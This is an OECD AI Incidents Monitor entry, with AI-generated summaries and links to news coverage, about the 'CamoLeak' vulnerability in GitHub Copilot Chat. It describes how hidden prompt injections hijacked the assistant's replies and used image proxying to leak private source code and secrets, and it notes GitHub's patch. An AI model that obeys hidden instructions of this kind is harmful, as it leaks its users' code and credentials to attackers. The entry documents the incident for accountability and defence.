GitHub Copilot Chat Vulnerability Exposes Private Code and Secrets

Thumbnail Image

The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

A critical vulnerability in GitHub Copilot Chat allowed attackers to exfiltrate private source code and secrets by exploiting prompt injection and image proxying. The flaw enabled hidden prompts to hijack the AI assistant's responses, leaking sensitive data. GitHub patched the issue by disabling image rendering in Copilot Chat.[AI generated]

Why's our monitor labelling this an incident or hazard?

The event involves an AI system (GitHub Copilot Chat) whose use and malfunction (vulnerability) directly led to a significant risk of harm, specifically the unauthorized disclosure of sensitive information, which constitutes harm to property and potentially to communities relying on secure software development. The vulnerability was actively exploitable, and proof-of-concept attacks demonstrated actual data exfiltration. Therefore, this qualifies as an AI Incident because the AI system's malfunction directly led to realized or imminent harm through data leakage.[AI generated]
AI principles
AccountabilityPrivacy & data governanceRobustness & digital securitySafety

Industries
IT infrastructure and hostingDigital security

Affected stakeholders
ConsumersBusiness

Harm types
Economic/PropertyReputational

Severity
AI incident

Business function:
Research and development

AI system task:
Interaction support/chatbotsContent generation


Articles about this incident or hazard

Thumbnail Image

GitHub patches Copilot Chat flaw that could leak secrets

2025-10-09
TheRegister.com
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose use and malfunction (vulnerability) directly led to a significant risk of harm, specifically the unauthorized disclosure of sensitive information, which constitutes harm to property and potentially to communities relying on secure software development. The vulnerability was actively exploitable, and proof-of-concept attacks demonstrated actual data exfiltration. Therefore, this qualifies as an AI Incident because the AI system's malfunction directly led to realized or imminent harm through data leakage.
Thumbnail Image

GitHub Copilot 'CamoLeak' AI Attack Exfiltrates Data

2025-10-09
Dark Reading
Why's our monitor labelling this an incident or hazard?
The event explicitly involves an AI system, GitHub Copilot, whose use and manipulation directly enable the exfiltration of sensitive user data, constituting harm to property and violation of user rights. The exploit demonstrates a malfunction or misuse of the AI system's outputs leading to realized harm potential. GitHub's mitigation efforts indicate the seriousness of the incident. Therefore, this qualifies as an AI Incident because the AI system's use has directly led to a security breach risk and potential harm to users.
Thumbnail Image

CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source Code

2025-10-08
Security Boulevard
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose malfunction (security vulnerability) directly led to harm by leaking private source code and secrets, which constitutes harm to property and violation of intellectual property rights. The attack exploited the AI system's context-aware capabilities and permissions, resulting in unauthorized data exfiltration. Therefore, this qualifies as an AI Incident due to realized harm caused by the AI system's malfunction.
Thumbnail Image

GitHub Copilot Chat Flaw Let Private Code Leak Via Images

2025-10-09
DataBreachToday
Why's our monitor labelling this an incident or hazard?
The event involves an AI system (GitHub Copilot Chat) whose malfunction (security flaw) directly led to the unauthorized leakage of private source code and secrets, which is harm to property and a violation of intellectual property rights. The exploit used AI prompt injection and the AI assistant's context awareness to exfiltrate data, fulfilling the criteria for an AI Incident. The harm is realized, not just potential, and the AI system's role is pivotal in enabling the data theft.
Thumbnail Image

Critical GitHub Copilot Vulnerability Let Attackers Exfiltrate Source Code From Private Repos

2025-10-10
Cyber Security News
Why's our monitor labelling this an incident or hazard?
GitHub Copilot Chat is an AI system that uses repository context to generate code suggestions. The described vulnerability exploited the AI's prompt processing and bypassed security controls to leak sensitive data from private repositories. This directly led to unauthorized exfiltration of source code and secrets, which is a clear harm to property and intellectual property rights. The event involves the use and malfunction of an AI system leading to realized harm, fitting the definition of an AI Incident.